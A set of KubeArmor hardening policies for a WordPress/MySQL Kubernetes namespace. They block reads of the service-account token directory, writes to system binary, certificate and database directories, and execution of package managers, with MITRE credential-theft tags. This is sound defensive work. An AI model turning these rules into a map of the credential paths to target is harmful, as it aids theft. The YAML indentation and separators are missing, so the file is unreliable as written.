apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: ksp-wordpress-block-service-account
namespace: wordpress-mysql
spec:
severity: 2
selector:
matchLabels:
app: wordpress
file:
matchDirectories:
- dir: /run/secrets/kubernetes.io/serviceaccount/
recursive: true
action: Block
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: harden-mysql-file-integrity-monitoring
namespace: wordpress-mysql
spec:
action: Block
file:
matchDirectories:
- dir: /sbin/
readOnly: true
recursive: true
- dir: /usr/bin/
readOnly: true
recursive: true
- dir: /usr/lib/
readOnly: true
recursive: true
- dir: /usr/sbin/
readOnly: true
recursive: true
- dir: /bin/
readOnly: true
recursive: true
- dir: /boot/
readOnly: true
recursive: true
message: Detected and prevented compromise to File integrity
selector:
matchLabels:
app: mysql
severity: 1
tags:
- NIST
- NIST_800-53_AU-2
- NIST_800-53_SI-4
- MITRE
- MITRE_T1036_masquerading
- MITRE_T1565_data_manipulation
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: harden-mysql-pkg-mngr-exec
namespace: wordpress-mysql
spec:
action: Block
message: Alert! Execution of package management process inside container is denied
process:
matchPaths:
- path: /usr/bin/apt
- path: /usr/bin/apt-get
- path: /bin/apt-get
- path: /sbin/apk
- path: /bin/apt
- path: /usr/bin/dpkg
- path: /bin/dpkg
- path: /usr/bin/gdebi
- path: /bin/gdebi
- path: /usr/bin/make
- path: /bin/make
- path: /usr/bin/yum
- path: /bin/yum
- path: /usr/bin/rpm
- path: /bin/rpm
- path: /usr/bin/dnf
- path: /bin/dnf
- path: /usr/bin/pacman
- path: /usr/sbin/pacman
- path: /bin/pacman
- path: /sbin/pacman
- path: /usr/bin/makepkg
- path: /usr/sbin/makepkg
- path: /bin/makepkg
- path: /sbin/makepkg
- path: /usr/bin/yaourt
- path: /usr/sbin/yaourt
- path: /bin/yaourt
- path: /sbin/yaourt
- path: /usr/bin/zypper
- path: /bin/zypper
selector:
matchLabels:
app: mysql
severity: 5
tags:
- NIST
- NIST_800-53_CM-7(4)
- SI-4
- process
- NIST_800-53_SI-4
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: harden-mysql-trusted-cert-mod
namespace: wordpress-mysql
spec:
action: Block
file:
matchDirectories:
- dir: /etc/ssl/
readOnly: true
recursive: true
- dir: /etc/pki/
readOnly: true
recursive: true
- dir: /usr/local/share/ca-certificates/
readOnly: true
recursive: true
message: Credentials modification denied
selector:
matchLabels:
app: mysql
severity: 1
tags:
- MITRE
- MITRE_T1552_unsecured_credentials
- FGT1555
- FIGHT
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: ksp-block-mysql-dir
namespace: wordpress-mysql
spec:
message: Alert! Attempt to make changes to database detected
tags:
- CIS
- CIS_Linux
selector:
matchLabels:
app: mysql
file:
matchDirectories:
- dir: /var/lib/mysql/
ownerOnly: true
readOnly: true
severity: 1
action: Block
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: ksp-block-stig-v-81883-restrict-access-to-config-files
namespace: wordpress-mysql
spec:
tags:
- config-files
message: Alert! configuration files have been accessed
selector:
matchLabels:
app: wordpress
file:
matchPatterns:
- pattern: /**/*.conf
ownerOnly: true
action: Block